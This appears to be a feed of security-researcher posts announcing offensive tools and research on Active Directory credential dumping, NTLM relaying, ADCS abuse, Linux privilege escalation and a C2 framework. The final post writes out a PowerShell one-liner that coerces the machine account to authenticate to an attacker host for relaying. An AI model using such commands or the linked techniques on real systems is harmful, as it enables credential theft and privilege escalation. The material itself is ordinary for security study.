Zak

If you're interested by an alternative way to dump domain users' NT hashes and TGT without touching LSASS, take a look at the new Masky tool :) Everything is explained in this article: z4ksec.github.io/posts/masky-re… Thanks @harmj0y, @tifkin_ and @ly4k_ for their amazing work on ADCS!

💥 Introducing "Dirty Frag" A universal Linux LPE chaining two vulns in xfrm-ESP and RxRPC. A successor class to Dirty Pipe & Copy Fail. No race, no panic on failure, fully deterministic. ~9 years latent. Ubuntu / RHEL / Fedora / openSUSE / CentOS / AlmaLinux, and more. Even if you've applied the "Copy Fail" mitigation, your Linux is still vulnerable to "Dirty Frag". Apply the Dirty Frag mitigation. Details: dirtyfrag.io

Relayed NTLM creds are powerful, if you can use them. @senderend shows why browsers fail through ntlmrelayx SOCKS and introduces ghostsurf to make NTLM-authenticated web apps accessible. Read more ⤵️ ghst.ly/4tnJOtx

WebRelayX - NTLM Relaying to generic web services with NTLM authentication github.com/SecCoreGmbH/We…

A new module just got merged into NetExec: get-scriptpath📜 This module queries all users for the scriptpath attribute. If you have privileges over one of these scripts (or they e.g. try to mount a network share) you can compromise this user on their next login. Made by @0xwyndo

Happy weekend! Enjoy our analysis of CVE-2026-3055 - yet another 'Memory Overread' vulnerability in Citrix NetScaler appliances. labs.watchtowr.com/the-sequels-ar…

In this blogpost I tried to sum up everything I know, walking you from the "I have an EDR, I'm secure" mindset to "let's build a resilient tiering model". Let me know what you think about it :)! sensepost.com/blog/2026/from…

meet VMkatz, github.com/nikaiw/VMkatz

ADCSDevilCOM 📍 A C# tool for requesting certificates from ADCS using DCOM over SMB. This tool allows you to remotely request X.509 certificates from CA server using the MS-WCCE protocol over DCOM and It bypasses the traditional endpoint mapper requirement by using SMB directly. By: @AnonArtist8 github.com/7hePr0fess0r/A…

Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled. Read for more ⤵️ ghst.ly/4qtl2rm

hashcat v7.0.0 released! After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had. Detailed writeup is available here: hashcat.net/forum/thread-1…

Red teamers know the drill: endless file churning, hunting for passwords & tokens. 🔍 Meet DeepPass2, our new secret scanning tool that goes beyond structured tokens to catch those tricky free-form passwords too. Read Neeraj Gupta's blog post for more. ghst.ly/40HLNNA

This new @SpecterOps paper fills me with so much joy

And here's the direct link to Ramoreik and s_lck's work: github.com/TheSleekBoyCom…

It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates. Also includes ESC1 over Intune (in some cases). dirkjanm.io/extending-ad-c… Oh, and a new tool for SCEP: github.com/dirkjanm/scepr…

This is so much! 🔥🔥😎 Found two new Potato triggers just today. Not only Potato but can also be used for LPE as remote auth is done which could be relayed to LDAP without Signing enabled. Or relayed to ADCS for a certificate. github.com/warpnet/MS-RPC…

Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! infinitycurve.org/blog/introduct…

New article for those curious about what they can find in the AD Recycle Bin (Bonus: I updated bloodyAD so you can play on this😉) linkedin.com/feed/update/ur…

FileFix - A ClickFix Alternative mrd0x.com/filefix-clickf…

Introducing the BloodHound Query Library! 📚 @martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵